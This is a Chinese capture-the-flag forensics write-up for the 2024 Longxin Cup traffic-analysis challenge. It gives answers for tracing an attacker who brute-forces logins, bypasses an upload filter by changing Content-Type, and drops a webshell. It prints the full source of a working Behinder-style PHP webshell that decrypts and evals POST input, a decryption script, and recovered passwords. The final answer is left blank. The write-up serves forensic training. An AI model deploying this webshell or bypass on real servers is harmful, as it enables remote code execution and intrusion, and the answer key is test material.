2024年龙信杯流量

1.分析流量包检材，给出管理员对web环境进行管理的工具名。（标准格式：小皮）

答案：宝塔

在流量包的开头发现宝塔流量

2.分析流量包检材，给出攻击者的ip地址是多少。（标准格式：127.0.0.1）

答案：192.168.209.135

过滤http 发现135一直在向147发请求

3.分析流量包检材，给出攻击者爆破出的网站非管理员用户名是。（标准格式：admin）

答案：luna

导出文件名包含login.php的 然后观察login_error

最终找到两个用户 luna和saber

接下来寻找谁是非管理员

得到saber为管理员用户

那么luna为非管理员

4.分析流量包检材，攻击者进行目录扫描得到的具有后门的页面url路径为。（标准格式：/abc.html）

答案： up_load.html

导出http对象，发现大量的包大小都为548bytes

这两个大小不一致追踪http流查看

追踪流发现 up_load.html 为后⻔⻚⾯

5.分析流量包检材，攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。（标准格式：test-type）

答案：Content-Type

导出http对象，发现cont.php

追踪流发现为冰蝎webshell流量，确定了cont.php是恶意文件。并且在cont.php第一次出现时还发现了up_load.php

追踪up_load.php包,发现曾上传asp文件但是显示Invalid file

又发现上传cont.jpg,上传成功

找到cont.php上传成功

发现更改了 Content-Type

6.分析流量包检材，攻击者上传成功的恶意文件, 该文件的临时存放路径是。（标准格式：/abc/edf）

答案：/tmp/php38mbeJ

接上题，上传成功后显示临时存放路径

7.分析流量包检材，服务器php配置文件的存放位置（标准格式：/www/sev/php.ini）

答案：/www/server/php/82/etc/php.ini

cont.php

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

过滤出所有cont.php的包

将加密流量进⾏ aes 解密 , key 为 e45e329feb5d925b

解密脚本

<?php

$key = "e45e329feb5d925b";

$text = "xxxxx";
$text = openssl_decrypt($text, "AES128", $key);

echo $text;

?>

base64解密发现数据

返回包流量进⾏解码 , 发现 phpinfo 内容 ( 分组 28897)

转换成html

8.分析流量包检材，被攻击的web环境其数据库密码是。（标准格式：qwer1234）

答案：X847Z3QzF1a6MHjR

同上题 ( 分组 20299)

请求包解密后

返回包解密后发现答案

9.分析流量包检材，服务器管理存放临时登录密码的位置。（标准格式：/tmp/pass）

答案：/tmp/tmppass

同上题（分组29862）

请求包

10.分析流量包检材，黑客获取的高权限主机的登录密码。（标准格式：qwer1234）

答案：

接上题返回包